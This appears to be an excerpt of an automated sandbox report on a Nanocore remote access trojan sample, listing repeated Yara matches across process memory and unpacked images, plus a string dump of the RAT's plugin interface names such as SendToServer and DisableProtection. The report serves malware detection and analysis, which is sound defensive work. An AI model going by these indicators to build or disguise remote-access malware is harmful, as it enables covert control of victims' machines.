Source: Yara match File source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat
Source: cat464923.exe, 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: cat464923.exe, 00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: cat464923.exe, 00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: cat464923.exe, 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: smtpsvc.exe, 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Yara detected Nanocore RAT
Source: Yara match File source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348105483.0000000002491000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY
Source: Yara match File source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE